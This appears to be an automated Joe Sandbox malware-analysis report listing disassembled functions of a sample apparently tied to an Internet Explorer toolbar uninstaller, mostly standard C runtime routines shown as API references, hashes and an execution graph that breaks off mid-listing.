                                                                                  Similarity
                                                                                  • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                  • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^t
                                                                                  • API String ID: 474438367-1096769585
                                                                                  • Opcode ID: 7fb500ba8f74e00bfb14dd2a2e5b7f5aedb10c4d009908790b557882a8efdc51
                                                                                  • Instruction ID: 83c23eb2e0a4c5f654c65ab9d22e7759c9ead5f4f12e149316fa50e2624b3289
                                                                                  • Opcode Fuzzy Hash: 7fb500ba8f74e00bfb14dd2a2e5b7f5aedb10c4d009908790b557882a8efdc51
                                                                                  • Instruction Fuzzy Hash: 3911B132607655ABC723AB64AC28B9F379CBE44751B010527F5C2D20D1CF618849CAB6
                                                                                  Function 00301465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 16 301465-301476 call 30143a ExitProcess
                                                                                  APIs
                                                                                  • ___crtCorExitProcess.LIBCMT ref: 0030146D
                                                                                    • Part of subcall function 0030143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00301472,?,?,003054EE,000000FF,0000001E,?,003036FC,?,00000001,?,?,00302A2A,00000018), ref: 00301444
                                                                                    • Part of subcall function 0030143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00301454
                                                                                  • ExitProcess.KERNEL32 ref: 00301476
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                  • String ID:
                                                                                  • API String ID: 2427264223-0
                                                                                  • Opcode ID: c5865d39fb7b14c155d6c55c1d30f62c6a451edf6336b6f4593f23630f82a45b
                                                                                  • Instruction ID: 4b49dfb196d124215877be73d2fc4a4c079ca914c9a4c54229b288a895bce189
                                                                                  • Opcode Fuzzy Hash: c5865d39fb7b14c155d6c55c1d30f62c6a451edf6336b6f4593f23630f82a45b
                                                                                  • Instruction Fuzzy Hash: C6B09231002108BBDB032F12DC1A84E3F2AFB803A0BA08021F8484A071DF72AD929A94
                                                                                  Function 0030261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 19 30261b-30263d HeapCreate 20 302641-30264a 19->20 21 30263f-302640 19->21
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00302630
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 10892065-0
                                                                                  • Opcode ID: 8053d4636aedb302f7164e5da5274dc54f519325b22f44d4d7686e8814f4210e
                                                                                  • Instruction ID: a6c2c15adb2f41a8e56bed7a75719238166e1822063fca7c6475d209da739f72
                                                                                  • Opcode Fuzzy Hash: 8053d4636aedb302f7164e5da5274dc54f519325b22f44d4d7686e8814f4210e
                                                                                  • Instruction Fuzzy Hash: ACD0A7325553486EDB025F717C68B223BDCD784795F108437B94CC6190F671C591CB00
                                                                                  Function 00301681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 22 301681-30168d call 301555 24 301692-301696 22->24
                                                                                  APIs
                                                                                  • _doexit.LIBCMT ref: 0030168D
                                                                                    • Part of subcall function 00301555: __lock.LIBCMT ref: 00301563
                                                                                    • Part of subcall function 00301555: __decode_pointer.LIBCMT ref: 0030159A
                                                                                    • Part of subcall function 00301555: __decode_pointer.LIBCMT ref: 003015AF
                                                                                    • Part of subcall function 00301555: __decode_pointer.LIBCMT ref: 003015D9
                                                                                    • Part of subcall function 00301555: __decode_pointer.LIBCMT ref: 003015EF
                                                                                    • Part of subcall function 00301555: __decode_pointer.LIBCMT ref: 003015FC
                                                                                    • Part of subcall function 00301555: __initterm.LIBCMT ref: 0030162B
                                                                                    • Part of subcall function 00301555: __initterm.LIBCMT ref: 0030163B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 1597249276-0
                                                                                  • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction ID: bfcb33069b40f4c00f9894bf2d8a145d72338f723d3675d705181b5f40b570df
                                                                                  • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction Fuzzy Hash: FFB0123258030C33DB212586EC13F063F0D87C1BA0F250020FA0C1D1F1B9A3B96180CA

                                                                                  Non-executed Functions

                                                                                  Function 003010CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00301346
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030135B
                                                                                  • UnhandledExceptionFilter.KERNEL32(0030816C), ref: 00301366
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00301382
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00301389
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 8d39215a45b6d6299f5bfaed084b50bd2d39bfb580399f3214d826178c68ccb5
                                                                                  • Instruction ID: 8b9420779b97d21f26f2d5383b52ef0bea4159fbf8f32c214017d249536d64a8
                                                                                  • Opcode Fuzzy Hash: 8d39215a45b6d6299f5bfaed084b50bd2d39bfb580399f3214d826178c68ccb5
                                                                                  • Instruction Fuzzy Hash: A321CDB5803B049FD713DF28FD746483BBCBB18342F01401BE54886AA0EBB85984CF4A
                                                                                  Function 003021E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00309458,0000000C,00302320,00000000,00000000,?,0030174F,00000003,?,?,?,?,?,?,003010F6), ref: 003021F7
                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 00302202
                                                                                    • Part of subcall function 003013E1: Sleep.KERNEL32(000003E8,00000000,?,00302148,KERNEL32.DLL,?,00302194,?,0030174F,00000003), ref: 003013ED
                                                                                    • Part of subcall function 003013E1: GetModuleHandleW.KERNEL32(?,?,00302148,KERNEL32.DLL,?,00302194,?,0030174F,00000003,?,?,?,?,?,?,003010F6), ref: 003013F6
                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0030222B
                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0030223B
                                                                                  • __lock.LIBCMT ref: 0030225D
                                                                                  • InterlockedIncrement.KERNEL32(0030A4D8), ref: 0030226A
                                                                                  • __lock.LIBCMT ref: 0030227E
                                                                                  • ___addlocaleref.LIBCMT ref: 0030229C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                  • API String ID: 1028249917-2843748187
                                                                                  • Opcode ID: ce1b57d88d3970987145f0ef4c2ade75bffaf065220600fb9cc6db5d4583cb91
                                                                                  • Instruction ID: 99a68ec33bea7155cf3deb0742381c50105f52ad31c6858e80c1a00426a8908a
                                                                                  • Opcode Fuzzy Hash: ce1b57d88d3970987145f0ef4c2ade75bffaf065220600fb9cc6db5d4583cb91
                                                                                  • Instruction Fuzzy Hash: CD11D270902B01AFD762EF76D869B4BBBE4AF14310F20481AE499976E1CF7099408B24
                                                                                  Function 003040A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 170 3040a0-3040bb call 30264c call 302345 175 3040da-3040f2 call 302aa0 170->175 176 3040bd-3040c1 170->176 181 3040f4-3040f6 175->181 182 30412a-304136 call 30413b 175->182 176->175 178 3040c3 176->178 180 3040c6-3040c8 178->180 183 3040d2-3040d9 call 302691 180->183 184 3040ca-3040d1 call 301411 180->184 185 304112-304124 InterlockedIncrement 181->185 186 3040f8-304101 InterlockedDecrement 181->186 182->180 184->183 185->182 186->185 190 304103-304109 186->190 190->185 194 30410b-304111 call 3035ee 190->194 194->185
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 003040AC
                                                                                    • Part of subcall function 00302345: __getptd_noexit.LIBCMT ref: 00302348
                                                                                    • Part of subcall function 00302345: __amsg_exit.LIBCMT ref: 00302355
                                                                                  • __amsg_exit.LIBCMT ref: 003040CC
                                                                                  • __lock.LIBCMT ref: 003040DC
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 003040F9
                                                                                  • InterlockedIncrement.KERNEL32(01532B08), ref: 00304124
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: c870b7af91c3059f0eeafb8edcf0982f15894d02977e0b8bbf4707905d2367f5
                                                                                  • Instruction ID: 7c1bc521e239608ddcf5ab7a13e54ecfdf411516a8d42e609fd7379254befc0a
                                                                                  • Opcode Fuzzy Hash: c870b7af91c3059f0eeafb8edcf0982f15894d02977e0b8bbf4707905d2367f5
                                                                                  • Instruction Fuzzy Hash: 2301C471A03B159BC727AF29983675DB364BF00710F064046EA00BB6D1CB346E91DBD5
                                                                                  Function 003035EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 197 3035ee-3035ff call 30264c 200 303601-303608 197->200 201 303676-30367b call 302691 197->201 202 30360a-303622 call 302aa0 call 3045e4 200->202 203 30364d 200->203 215 303624-30362c call 304614 202->215 216 30362d-30363d call 303644 202->216 205 30364e-30365e HeapFree 203->205 205->201 208 303660-303675 call 302c72 GetLastError call 302c30 205->208 208->201 215->216 216->201 222 30363f-303642 216->222 222->205
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0030360C
                                                                                    • Part of subcall function 00302AA0: __mtinitlocknum.LIBCMT ref: 00302AB6
                                                                                    • Part of subcall function 00302AA0: __amsg_exit.LIBCMT ref: 00302AC2
                                                                                    • Part of subcall function 00302AA0: EnterCriticalSection.KERNEL32(?,?,?,00305600,00000004,00309628,0000000C,00303746,?,?,00000000,00000000,00000000,?,003022F7,00000001), ref: 00302ACA
                                                                                  • ___sbh_find_block.LIBCMT ref: 00303617
                                                                                  • ___sbh_free_block.LIBCMT ref: 00303626
                                                                                  • HeapFree.KERNEL32(00000000,?,00309568,0000000C,00302A81,00000000,003094C8,0000000C,00302ABB,?,?,?,00305600,00000004,00309628,0000000C), ref: 00303656
                                                                                  • GetLastError.KERNEL32(?,00305600,00000004,00309628,0000000C,00303746,?,?,00000000,00000000,00000000,?,003022F7,00000001,00000214), ref: 00303667
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: 0e4f6e8b5309024c3a1591f332124f2f9a9b4acfc466bca34e745d954707d3a8
                                                                                  • Instruction ID: ffd632ada3a434f122805d5f4ef90cc6038d745021fa0d141e081a6aec54730a
                                                                                  • Opcode Fuzzy Hash: 0e4f6e8b5309024c3a1591f332124f2f9a9b4acfc466bca34e745d954707d3a8
                                                                                  • Instruction Fuzzy Hash: 5F01D671D07709BADB236B719C7AB4F766CAF01760F61400AF4406A1D1CF368740CB59
                                                                                  Function 00303E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 223 303e04-303e1f call 30264c call 302345 228 303e21-303e25 223->228 229 303e43-303e6c call 302aa0 call 303dc6 call 303e6e 223->229 228->229 230 303e27-303e2c call 302345 228->230 237 303e2f-303e31 229->237 230->237 239 303e33-303e3a call 301411 237->239 240 303e3b-303e42 call 302691 237->240 239->240
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00303E10
                                                                                    • Part of subcall function 00302345: __getptd_noexit.LIBCMT ref: 00302348
                                                                                    • Part of subcall function 00302345: __amsg_exit.LIBCMT ref: 00302355
                                                                                  • __getptd.LIBCMT ref: 00303E27
                                                                                  • __amsg_exit.LIBCMT ref: 00303E35
                                                                                  • __lock.LIBCMT ref: 00303E45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 3521780317-0
                                                                                  • Opcode ID: c0c50f7c956ca62e699169cdde2b5b49f9c24f6a8a3a7c5923fcb88106a7909b
                                                                                  • Instruction ID: 6659f9a6b7a2acdde14740cfc723c9c984c9249e6d699446bd76b6efe1d3cbfc
                                                                                  • Opcode Fuzzy Hash: c0c50f7c956ca62e699169cdde2b5b49f9c24f6a8a3a7c5923fcb88106a7909b
                                                                                  • Instruction Fuzzy Hash: 14F09036A037058BD763BB75C42A74E72A8AF44720F51428AE4419FAD2CF749A01CB52

                                                                                  Execution Graph

                                                                                  Execution Coverage:6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:1047
                                                                                  Total number of Limit Nodes:29
                                                                                  execution_graph 3962 9226b0 3963 9226e9 3962->3963 3964 9226dc 3962->3964 3965 9210cc __setmbcp_nolock 5 API calls 3963->3965 3966 9210cc __setmbcp_nolock 5 API calls 3964->3966 3967 9226f9 __except_handler4 __IsNonwritableInCurrentImage 3965->3967 3966->3963 3968 92277c 3967->3968 3969 922752 __except_handler4 3967->3969 3978 9251ca RtlUnwind 3967->3978 3969->3968 3970 92276c 3969->3970 3972 9210cc __setmbcp_nolock 5 API calls 3969->3972 3971 9210cc __setmbcp_nolock 5 API calls 3970->3971 3971->3968 3972->3970 3974 9227cb __except_handler4 3975 9227ff 3974->3975 3976 9210cc __setmbcp_nolock 5 API calls 3974->3976 3977 9210cc __setmbcp_nolock 5 API calls 3975->3977 3976->3975 3977->3969 3978->3974 3892 921391 3893 9213cd 3892->3893 3894 9213a3 3892->3894 3894->3893 3896 9228da 3894->3896 3897 9228e6 __mtinitlocknum 3896->3897 3902 922345 3897->3902 3903 9222cc __getptd_noexit 66 API calls 3902->3903 3904 92234d 3903->3904 3905 921411 __amsg_exit 66 API calls 3904->3905 3906 92235a 3904->3906 3905->3906 3907 9251fb 3906->3907 3908 925221 3907->3908 3909 92521a 3907->3909 3919 922f92 3908->3919 3910 921719 __NMSG_WRITE 66 API calls 3909->3910 3910->3908 3913 925232 _abort 3915 92530a 3913->3915 3917 9252ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3913->3917 3943 921697 3915->3943 3917->3915 3920 9220f9 __decode_pointer 6 API calls 3919->3920 3921 922f9d 3920->3921 3921->3913 3922 922f9f 3921->3922 3926 922fab __mtinitlocknum 3922->3926 3923 923007 3924 922fe8 3923->3924 3929 923016 3923->3929 3928 9220f9 __decode_pointer 6 API calls 3924->3928 3925 922fd2 3927 9222cc __getptd_noexit 66 API calls 3925->3927 3926->3923 3926->3924 3926->3925 3932 922fce 3926->3932 3930 922fd7 _siglookup 3927->3930 3928->3930 3931 922c72 __mtinitlocknum 66 API calls 3929->3931 3934 92307d 3930->3934 3936 921697 _abort 66 API calls 3930->3936 3942 922fe0 __mtinitlocknum 3930->3942 3933 92301b 3931->3933 3932->3925 3932->3929 3935 922c0a _raise 6 API calls 3933->3935 3937 922aa0 __lock 66 API calls 3934->3937 3939 923088 3934->3939 3935->3942 3936->3934 3937->3939 3938 9220f0 _raise 6 API calls 3940 9230bd 3938->3940 3939->3938 3939->3940 3946 923113 3940->3946 3942->3913 3944 921555 _doexit 66 API calls 3943->3944 3945 9216a8 3944->3945 3947 923120 3946->3947 3948 923119 3946->3948 3947->3942 3950 9229c6 LeaveCriticalSection 3948->3950 3950->3947 3979 9231b4 3980 9231c0 SetLastError 3979->3980 3981 9231c8 __mtinitlocknum 3979->3981 3980->3981 3982 925138 3983 92514a 3982->3983 3985 925158 @_EH4_CallFilterFunc@8 3982->3985 3984 9210cc __setmbcp_nolock 5 API calls 3983->3984 3984->3985 4437 9228fe 4438 922901 4437->4438 4439 9251fb _abort 68 API calls 4438->4439 4440 92290d __mtinitlocknum 4439->4440 3986 922d3f 3987 923730 __calloc_crt 66 API calls 3986->3987 3988 922d4b 3987->3988 3989 92207e __encode_pointer 6 API calls 3988->3989 3990 922d53 3989->3990 4000 92235f 4002 92236b __mtinitlocknum 4000->4002 4001 922383 4005 922391 4001->4005 4007 9235ee __mtinitlocknum 66 API calls 4001->4007 4002->4001 4003 92246d __mtinitlocknum 4002->4003 4004 9235ee __mtinitlocknum 66 API calls 4002->4004 4004->4001 4006 92239f 4005->4006 4008 9235ee __mtinitlocknum 66 API calls 4005->4008 4009 9235ee __mtinitlocknum 66 API calls 4006->4009 4010 9223ad 4006->4010 4007->4005 4008->4006 4009->4010 4011 9223bb 4010->4011 4012 9235ee __mtinitlocknum 66 API calls 4010->4012 4013 9223c9 4011->4013 4015 9235ee __mtinitlocknum 66 API calls 4011->4015 4012->4011 4014 9223d7 4013->4014 4016 9235ee __mtinitlocknum 66 API calls 4013->4016 4017 9223e8 4014->4017 4018 9235ee __mtinitlocknum 66 API calls 4014->4018 4015->4013 4016->4014 4019 922aa0 __lock 66 API calls 4017->4019 4018->4017 4020 9223f0 4019->4020 4021 922415 4020->4021 4022 9223fc InterlockedDecrement 4020->4022 4036 922479 4021->4036 4022->4021 4024 922407 4022->4024 4024->4021 4027 9235ee __mtinitlocknum 66 API calls 4024->4027 4026 922aa0 __lock 66 API calls 4028 922429 4026->4028 4027->4021 4029 92245a 4028->4029 4039 923d2d 4028->4039 4083 922485 4029->4083 4033 9235ee __mtinitlocknum 66 API calls 4033->4003 4086 9229c6 LeaveCriticalSection 4036->4086 4038 922422 4038->4026 4040 92243e 4039->4040 4041 923d3e InterlockedDecrement 4039->4041 4040->4029 4053 923b55 4040->4053 4042 923d53 InterlockedDecrement 4041->4042 4043 923d56 4041->4043 4042->4043 4044 923d63 4043->4044 4045 923d60 InterlockedDecrement 4043->4045 4046 923d70 4044->4046 4047 923d6d InterlockedDecrement 4044->4047 4045->4044 4048 923d7a InterlockedDecrement 4046->4048 4050 923d7d 4046->4050 4047->4046 4048->4050 4049 923d96 InterlockedDecrement 4049->4050 4050->4049 4051 923da6 InterlockedDecrement 4050->4051 4052 923db1 InterlockedDecrement 4050->4052 4051->4050 4052->4040 4054 923bd9 4053->4054 4060 923b6c 4053->4060 4055 923c26 4054->4055 4056 9235ee __mtinitlocknum 66 API calls 4054->4056 4062 923c4d 4055->4062 4111 925ae1 4055->4111 4058 923bfa 4056->4058 4059 9235ee __mtinitlocknum 66 API calls 4058->4059 4063 923c0d 4059->4063 4060->4054 4066 9235ee __mtinitlocknum 66 API calls 4060->4066 4081 923ba0 4060->4081 4065 923c92 4062->4065 4075 9235ee 66 API calls __mtinitlocknum 4062->4075 4069 9235ee __mtinitlocknum 66 API calls 4063->4069 4064 9235ee __mtinitlocknum 66 API calls 4070 923bce 4064->4070 4071 9235ee __mtinitlocknum 66 API calls 4065->4071 4072 923b95 4066->4072 4067 9235ee __mtinitlocknum 66 API calls 4067->4062 4068 9235ee __mtinitlocknum 66 API calls 4073 923bb6 4068->4073 4074 923c1b 4069->4074 4076 9235ee __mtinitlocknum 66 API calls 4070->4076 4077 923c98 4071->4077 4087 925cbb 4072->4087 4103 925c76 4073->4103 4080 9235ee __mtinitlocknum 66 API calls 4074->4080 4075->4062 4076->4054 4077->4029 4080->4055 4081->4068 4082 923bc1 4081->4082 4082->4064 4199 9229c6 LeaveCriticalSection 4083->4199 4085 922467 4085->4033 4086->4038 4088 925cc8 4087->4088 4102 925d45 4087->4102 4089 925cd9 4088->4089 4090 9235ee __mtinitlocknum 66 API calls 4088->4090 4091 925ceb 4089->4091 4092 9235ee __mtinitlocknum 66 API calls 4089->4092 4090->4089 4093 925cfd 4091->4093 4094 9235ee __mtinitlocknum 66 API calls 4091->4094 4092->4091 4095 9235ee __mtinitlocknum 66 API calls 4093->4095 4097 925d0f 4093->4097 4094->4093 4095->4097 4096 925d21 4099 925d33 4096->4099 4100 9235ee __mtinitlocknum 66 API calls 4096->4100 4097->4096 4098 9235ee __mtinitlocknum 66 API calls 4097->4098 4098->4096 4101 9235ee __mtinitlocknum 66 API calls 4099->4101 4099->4102 4100->4099 4101->4102 4102->4081 4104 925c83 4103->4104 4110 925cb7 4103->4110 4105 9235ee __mtinitlocknum 66 API calls 4104->4105 4106 925c93 4104->4106 4105->4106 4107 9235ee __mtinitlocknum 66 API calls 4106->4107 4109 925ca5 4106->4109 4107->4109 4108 9235ee __mtinitlocknum 66 API calls 4108->4110 4109->4108 4109->4110 4110->4082 4112 925af2 4111->4112 4113 923c46 4111->4113 4114 9235ee __mtinitlocknum 66 API calls 4112->4114 4113->4067 4115 925afa 4114->4115 4116 9235ee __mtinitlocknum 66 API calls 4115->4116 4117 925b02 4116->4117 4118 9235ee __mtinitlocknum 66 API calls 4117->4118 4119 925b0a 4118->4119 4120 9235ee __mtinitlocknum 66 API calls 4119->4120 4121 925b12 4120->4121 4122 9235ee __mtinitlocknum 66 API calls 4121->4122 4123 925b1a 4122->4123 4124 9235ee __mtinitlocknum 66 API calls 4123->4124 4125 925b22 4124->4125 4126 9235ee __mtinitlocknum 66 API calls 4125->4126 4127 925b29 4126->4127 4128 9235ee __mtinitlocknum 66 API calls 4127->4128 4129 925b31 4128->4129 4130 9235ee __mtinitlocknum 66 API calls 4129->4130 4131 925b39 4130->4131 4132 9235ee __mtinitlocknum 66 API calls 4131->4132 4133 925b41 4132->4133 4134 9235ee __mtinitlocknum 66 API calls 4133->4134 4135 925b49 4134->4135 4136 9235ee __mtinitlocknum 66 API calls 4135->4136 4137 925b51 4136->4137 4138 9235ee __mtinitlocknum 66 API calls 4137->4138 4139 925b59 4138->4139 4140 9235ee __mtinitlocknum 66 API calls 4139->4140 4141 925b61 4140->4141 4142 9235ee __mtinitlocknum 66 API calls 4141->4142 4143 925b69 4142->4143 4144 9235ee __mtinitlocknum 66 API calls 4143->4144 4145 925b71 4144->4145 4146 9235ee __mtinitlocknum 66 API calls 4145->4146 4147 925b7c 4146->4147 4148 9235ee __mtinitlocknum 66 API calls 4147->4148 4149 925b84 4148->4149 4150 9235ee __mtinitlocknum 66 API calls 4149->4150 4151 925b8c 4150->4151 4152 9235ee __mtinitlocknum 66 API calls 4151->4152 4153 925b94 4152->4153 4154 9235ee __mtinitlocknum 66 API calls 4153->4154 4155 925b9c 4154->4155 4156 9235ee __mtinitlocknum 66 API calls 4155->4156 4157 925ba4 4156->4157 4158 9235ee __mtinitlocknum 66 API calls 4157->4158 4159 925bac 4158->4159 4160 9235ee __mtinitlocknum 66 API calls 4159->4160 4161 